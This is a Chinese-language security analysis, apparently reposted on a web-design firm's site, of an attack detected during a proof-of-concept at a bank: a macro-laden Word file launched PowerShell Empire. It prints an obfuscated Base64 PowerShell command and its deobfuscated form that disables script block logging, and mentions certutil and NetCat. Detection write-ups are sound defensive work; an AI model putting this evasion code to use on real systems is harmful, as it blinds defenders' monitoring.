實(shí)際場(chǎng)景下如何在POC中檢測(cè)的攻擊流量，相信很多沒(méi)有經(jīng)驗(yàn)的人對(duì)此束手無(wú)策，為此本文總結(jié)了問(wèn)題出現(xiàn)的原因和解決方法，通過(guò)這篇文章希望你能解決這個(gè)問(wèn)題。

創(chuàng)新互聯(lián)專注為客戶提供全方位的互聯(lián)網(wǎng)綜合服務(wù)，包含不限于網(wǎng)站建設(shè)、成都網(wǎng)站建設(shè)、新都網(wǎng)絡(luò)推廣、微信平臺(tái)小程序開發(fā)、新都網(wǎng)絡(luò)營(yíng)銷、新都企業(yè)策劃、新都品牌公關(guān)、搜索引擎seo、人物專訪、企業(yè)宣傳片、企業(yè)代運(yùn)營(yíng)等，從售前售中售后，我們都將竭誠(chéng)為您服務(wù)，您的肯定，是我們最大的嘉獎(jiǎng)；創(chuàng)新互聯(lián)為所有大學(xué)生創(chuàng)業(yè)者提供新都建站搭建服務(wù)，24小時(shí)服務(wù)熱線：028-86922220，官方網(wǎng)址：m.newbst.com

直奔主題

近期，我們?cè)趯?duì)一份來(lái)自大型銀行客戶的PoC進(jìn)行研究，研究了幾天之后，我們?cè)谕慌_(tái)設(shè)備上發(fā)現(xiàn)了多個(gè)安全威脅，其中包括滲透測(cè)試過(guò)程中常見的威脅。

比如說(shuō)：

1.Eicar樣本；

2.CQHashDumpv2（密碼導(dǎo)出工具）；

3.NetCat安裝。

我們?cè)谠儐?wèn)客戶之后，得知原來(lái)其中的部分事件是當(dāng)時(shí)在得到授權(quán)的情況下所進(jìn)行的滲透測(cè)試檢查。

但隨后，我們發(fā)現(xiàn)了一個(gè)針對(duì)Firefox的漏洞利用活動(dòng)，整個(gè)攻擊時(shí)間軸如下圖所示：

這張圖足矣幫助我們了解設(shè)備上到底發(fā)生了什么。接下來(lái)，我們還發(fā)現(xiàn)了以下幾個(gè)有意思的地方：

1.攻擊是從一個(gè)通過(guò)Firefox瀏覽器下載的惡意Word文檔開始的（很可能是某封郵件的），這個(gè)文檔使用了宏功能來(lái)開啟PowerShell控制臺(tái)，然后運(yùn)行Empire代碼。

我們的客戶端檢測(cè)到的漏洞利用文件如下：

根據(jù)VirusTotal的記錄，我們檢測(cè)到的這個(gè)漏洞利用文件是之前沒(méi)出現(xiàn)過(guò)的。漏洞利用代碼的首次上傳時(shí)間為2018-10-24 09:17:01 UTC，就在客戶設(shè)備打開該文件的兩個(gè)小時(shí)之前。

2.檢測(cè)到該威脅之后，VT中的57個(gè)引擎只有12個(gè)（基于AI的引擎）能識(shí)別出這個(gè)惡意文檔：

3.PowerShell中加載了經(jīng)過(guò)混淆處理的Base64代碼：

下面給出的是經(jīng)過(guò)混淆處理后的代碼：

-W 1-C[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('c3RvcC1wcm9jZXNzIC1uYW1lIHJlZ3N2cjMyIC1Gb3JjZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQ=='))|iex;[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('SWYoJHtQYFNgVmVyc2BJb05UQWJsZX0uUFNWZXJzaW9OLk1hSk9yIC1nZSAzKXske2dgUGZ9PVtSRWZdLkFTU2VNYmx5LkdFVFRZUEUoKCdTeXN0ZW0uJysnTWFuYWdlJysnbWUnKydudCcrJy5BJysndXRvbWF0aW9uLlUnKyd0aWxzJykpLiJHZVRGSWVgTGQiKCgnY2FjaGVkRycrJ3JvJysndXAnKydQb2xpYycrJ3lTZXR0aW4nKydncycpLCdOJysoJ29uUHUnKydibGljLCcrJ1N0YXQnKydpYycpKTtJZigke2dgcEZ9KXske0dgUGN9PSR7R2BwZn0uR2V0VkFMVWUoJHtOdWBMbH0pO0lmKCR7Z2BwY31bKCdTJysnY3InKydpcHRCJykrKCdsbycrJ2NrTG8nKydnZ2knKyduZycpXSl7JHtHYFBDfVsoJ1NjcmlwdCcrJ0InKSsoJ2wnKydvY2tMb2dnaScrJ25nJyldWygnRW5hJysnYicrJ2xlJysnU2MnKydyaXB0QicpKygnbG8nKydja0wnKydvZ2cnKydpbmcnKV09MDske2dgUEN9WygnU2NyaScrJ3AnKyd0QicpKygnbG9jaycrJ0xvZ2dpJysnbicrJ2cnKV1bKCdFbmEnKydiJysnbGVTYycrJ3JpJysncHRCJysnbG9ja0ludm9jYXRpb25Mb2cnKydnaScrJ25nJyldPTB9JHtWYEFsfT1bQ29sbGVDdGlvTnMuR2VOZVJ

接下來(lái)，我們對(duì)Base64代碼進(jìn)行了恢復(fù)，整個(gè)過(guò)程分為兩個(gè)階段：

半混淆代碼

If(${P`S`Vers`IoNTAble}.PSVersioN.MaJOr-ge3){${g`Pf}=[REf].ASSeMbly.GETTYPE(('System.'+'Manage'+'me'+'nt'+'.A'+'utomation.U'+'tils'))."GeTFIe`Ld"(('cachedG'+'ro'+'up'+'Polic'+'ySettin'+'gs'),'N'+('onPu'+'blic,'+'Stat'+'ic'));If(${g`pF}){${G`Pc}=${G`pf}.GetVALUe(${Nu`Ll});If(${g`pc}[('S'+'cr'+'iptB')+('lo'+'ckLo'+'ggi'+'ng')]){${G`PC}[('Script'+'B')+('l'+'ockLoggi'+'ng')][('Ena'+'b'+'le'+'Sc'+'riptB')+('lo'+'ckL'+'ogg'+'ing')]=0;${g`PC}[('Scri'+'p'+'tB')+('lock'+'Loggi'+'n'+'g')][('Ena'+'b'+'leSc'+'ri'+'ptB'+'lockInvocationLog'+'gi'+'ng')]=0}${V`Al}=[ColleCtioNs.GeNeR

去混淆代碼

If(${PSVersIoNTAble}.PSVersioN.MaJOr-ge3){${gPf}=[REf].ASSeMbly.GETTYPE(('System.Management.Automation.Utils'))."GeTFIeLd"(('cachedGroupPolicySettings'),'N'+('onPublic,Static'));If(${gpF}){${GPc}=${Gpf}.GetVALUe(${NuLl});If(${gpc}[('ScriptB')+('lockLogging')]){${GPC}[('ScriptB')+('lockLogging')][('EnableScriptB')+('lockLogging')]=0;${gPC}[('ScriptB')+('lockLogging')][('EnableScriptBlockInvocationLogging')]=0}${V`Al}=[ColleCtioNs.GeNeR

原來(lái)，這是一段非常流行的Empire代碼，GitHub上就有：【傳送門】。

4.certutil進(jìn)程加載了一份可疑文件：

emp.txt hvKqcJJPFnm7.txt

大家也看到了，這個(gè)文件的文件名非常奇怪。作為一個(gè)txt文件，文件名里面還有一個(gè).txt，因此它成功引起了我們的注意。

5.我們還懷疑cmd加載了一個(gè)BAT文件：

代碼中涉及到的文件名是很長(zhǎng)的隨機(jī)名稱，而文件地址為\AppData\Roaming\目錄。

看完上述內(nèi)容，你們掌握實(shí)際場(chǎng)景下如何在POC中檢測(cè)的攻擊流量的方法了嗎？如果還想學(xué)到更多技能或想了解更多相關(guān)內(nèi)容，歡迎關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道，感謝各位的閱讀！

網(wǎng)站名稱：實(shí)際場(chǎng)景下如何在POC中檢測(cè)的攻擊流量
文章轉(zhuǎn)載：http://m.newbst.com/article10/jicgdo.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供品牌網(wǎng)站設(shè)計(jì)、品牌網(wǎng)站建設(shè)、網(wǎng)站排名、網(wǎng)站設(shè)計(jì)公司、服務(wù)器托管、網(wǎng)站制作

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請(qǐng)盡快告知，我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng)，如需處理請(qǐng)聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時(shí)需注明來(lái)源： 創(chuàng)新互聯(lián)